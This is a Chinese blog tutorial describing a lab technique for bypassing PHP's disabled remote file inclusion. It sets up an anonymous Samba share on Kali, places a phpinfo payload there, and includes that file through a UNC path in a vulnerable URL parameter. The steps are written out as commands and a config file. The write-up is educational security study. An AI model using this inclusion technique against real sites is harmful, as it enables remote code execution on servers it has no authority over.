【网络安全】利用samba服务绕过未开启文件包含配置

简介: 利用samba服务绕过未开启文件包含配置

 

博主昵称:跳楼梯企鹅
创作初心:本博客的初心为与技术朋友们相互交流,每个人的技术都存在短板,博主也是一样,虚心求教,希望各位技术友给予指导。
博主座右铭:发现光,追随光,成为光,散发光;
博主研究方向:渗透测试、机器学习 ;
博主寄语:感谢各位技术友的支持,您的支持就是我前进的动力 ;

图片.pngimage.gif

一、什么是smb服务?

SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统说白了就是文件共享

图片.png

二、实验开始

利用samba服务来绕过include没有开启两个配置的限制,实操截图

1.打开kail

image.gif图片.png

2.远程访问测试

这里很明显,无法包含,那么怎么就要用到其他方式

image.gif图片.png

3.打开apache2服务

image.gif图片.png

4.下载samba服务

图片.png

如果显示下图,说明安装成功

image.gif图片.png

5.创建一个共享文件

命令:mkdir pub

image.gif图片.png

6.给文件夹赋予权限

命令:chmod 0555 pub

命令:chown -R nobody:nogroup pub

image.gif图片.png

7.清空配置文件

代码:echo > /etc/samba/smb.conf

image.gif图片.png

8.编译samba服务

内容:

[global]

workgroup = WORKGROUP      

server string = Samba Server %v

netbios name = indishell-lab

security = user

map to guest = bad user

name resolve order = bcast host

dns proxy = no

bind interfaces only = yes

[ica]

path = /var/www/html/pub

writable = no

guest ok = yes

guest only = yes

read only = yes

directory mode = 0555

上面内容为匿名访问,也就是说不用账号密码就可以进行访问

image.gif图片.png

9.重启samba

命令:service smbd restart

image.gif图片.png

Windows下打开cmd 测试

image.gif图片.png

成功之后显示

image.gif图片.png

10.分析

这里ica文件对应的其实就是kail系统上的pub文件

image.gif图片.png

11.在pub文件下创建一个phpinfo文件

代码:vi phpinfo.txt

内部输入:<?php phpinfo();?>

image.gif图片.png

12.我们来看下文件ica文件内是不是更新了

image.gif图片.png

发现确实是更新了

13.开始利用

Url:http://127.0.0.1/shine/a.php?b=//虚拟机ip/ica/phpinfo.txt

image.gif图片.png

发现可以不开启远程文件包含的文件,也是可以通过samba服务进行远程文件包含

相关文章
|
3天前
|
安全 网络安全 数据安全/隐私保护
|
5天前
|
Docker 容器
docker swarm启动服务并连接到网络
【10月更文挑战第16天】
11 5
|
6天前
|
负载均衡 网络协议 关系型数据库
docker swarm 使用网络启动服务
【10月更文挑战第15天】
13 4
|
7天前
|
Docker 容器
docker swarm 在服务中使用网络
【10月更文挑战第14天】
9 2
|
18天前
|
网络协议 安全 网络安全
Cisco-网络端口地址转换NAPT配置
Cisco-网络端口地址转换NAPT配置
|
19天前
|
存储 安全 网络安全
云端盾牌:云计算时代的网络安全守护在数字化浪潮中,云计算以其高效、灵活的特性成为企业转型的加速器。然而,伴随其迅猛发展,网络安全问题亦如影随形,成为悬在每个组织头顶的达摩克利斯之剑。本文旨在探讨云计算服务中的网络安全挑战,分析信息安全的重要性,并提出相应对策,以期为企业构建一道坚实的云端防护网。
在当今这个数据驱动的时代,云计算已成为推动创新与效率的关键力量。它允许用户随时随地访问强大的计算资源,降低了企业的运营成本,加速了产品上市时间。但随之而来的网络威胁也日益猖獗,尤其是对于依赖云服务的企业而言,数据泄露、身份盗用等安全事件频发,不仅造成经济损失,更严重损害品牌信誉。本文深入剖析云计算环境中的安全风险,强调建立健全的信息安全管理机制的重要性,并分享一系列有效策略,旨在帮助企业和个人用户在享受云服务带来的便利的同时,也能构筑起强有力的网络防线。
|
8天前
|
存储 缓存 Ubuntu
配置网络接口的“IP”命令10个
【10月更文挑战第18天】配置网络接口的“IP”命令10个
31 0
|
2月前
|
机器学习/深度学习 安全 网络安全
云端盾牌:云计算时代的网络安全守护在这个数字脉搏加速跳动的时代,云计算以其高效、灵活的特性,成为推动企业数字化转型的强劲引擎。然而,正如每枚硬币都有两面,云计算的广泛应用也同步放大了网络安全的风险敞口。本文旨在探讨云计算服务中网络安全的关键作用,以及如何构建一道坚不可摧的信息防线,确保数据的安全与隐私。
云计算作为信息技术领域的革新力量,正深刻改变着企业的运营模式和人们的生活。但在享受其带来的便利与效率的同时,云服务的安全问题不容忽视。从数据泄露到服务中断,每一个安全事件都可能给企业和个人带来难以估量的损失。因此,本文聚焦于云计算环境下的网络安全挑战,分析其根源,并提出有效的防护策略,旨在为云服务的安全使用提供指导和参考。
64 8
|
18天前
|
机器学习/深度学习 人工智能 安全